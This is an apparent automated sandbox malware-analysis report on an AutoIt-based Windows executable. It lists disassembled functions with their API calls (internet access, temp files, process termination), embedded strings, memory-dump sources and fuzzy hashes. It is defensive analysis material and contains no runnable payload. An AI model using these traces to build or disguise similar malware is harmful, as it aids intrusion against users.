                                                                                                                                                                                                                                                            • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                                                                                                                                                            Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004295A0
                                                                                                                                                                                                                                                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                                                                                                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                                                                                                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                                                                                                                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                                                                                                                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                                                                                                                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                            • API String ID: 3938964917-2609313903
                                                                                                                                                                                                                                                            • Opcode ID: d55ed5192cb25b7a7045e07b36078ae3fec908a18861f5dd6d928dc74c473dc7
                                                                                                                                                                                                                                                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d55ed5192cb25b7a7045e07b36078ae3fec908a18861f5dd6d928dc74c473dc7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                                                                                                                                            Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00466825
                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                            • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                                                                                                                            • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                                                                                                                                                            Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InternetOpen
                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                            • API String ID: 2038078732-4266983199
                                                                                                                                                                                                                                                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                                                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                                                                                                                                            Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                                                                                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545,C:\Users\user\Desktop\LKxcbzlwkz.exe,004A90E8,C:\Users\user\Desktop\LKxcbzlwkz.exe,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                                                                                                                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                                                                                                                                                            • String ID: X$pWH
                                                                                                                                                                                                                                                            • API String ID: 85490731-941433119
                                                                                                                                                                                                                                                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                                                                                                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                                                                                                                                            Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fread_nolock_memmove
                                                                                                                                                                                                                                                            • String ID: EA06
                                                                                                                                                                                                                                                            • API String ID: 1988441806-3962188686
                                                                                                                                                                                                                                                            • Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                                                                                                                                                                                                            • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                                                                                                                                                            Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: @EXITCODE
                                                                                                                                                                                                                                                            • API String ID: 2734553683-3436989551
                                                                                                                                                                                                                                                            • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                                                                                                                                            • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                                                                                                                                                            Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\Desktop\LKxcbzlwkz.exe, xrefs: 00410107
                                                                                                                                                                                                                                                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strcat
                                                                                                                                                                                                                                                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                            • API String ID: 1765576173-1911961656
                                                                                                                                                                                                                                                            • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                                                                                                                                                            • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                                                                                                                                            Function 00431E1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                            • String ID: aut
                                                                                                                                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                            • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                                                                                                                                                            • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                                                                                                                                                                                                            Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                                                                                                                                                                                                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                                                                                                                            Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1794320848-0
                                                                                                                                                                                                                                                            • Opcode ID: 46bae6a85b22b2e6998b893eef9abdde81a4ff8b830947c69d08c34cc75fe5f8
                                                                                                                                                                                                                                                            • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46bae6a85b22b2e6998b893eef9abdde81a4ff8b830947c69d08c34cc75fe5f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                                                                                                                                                            Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
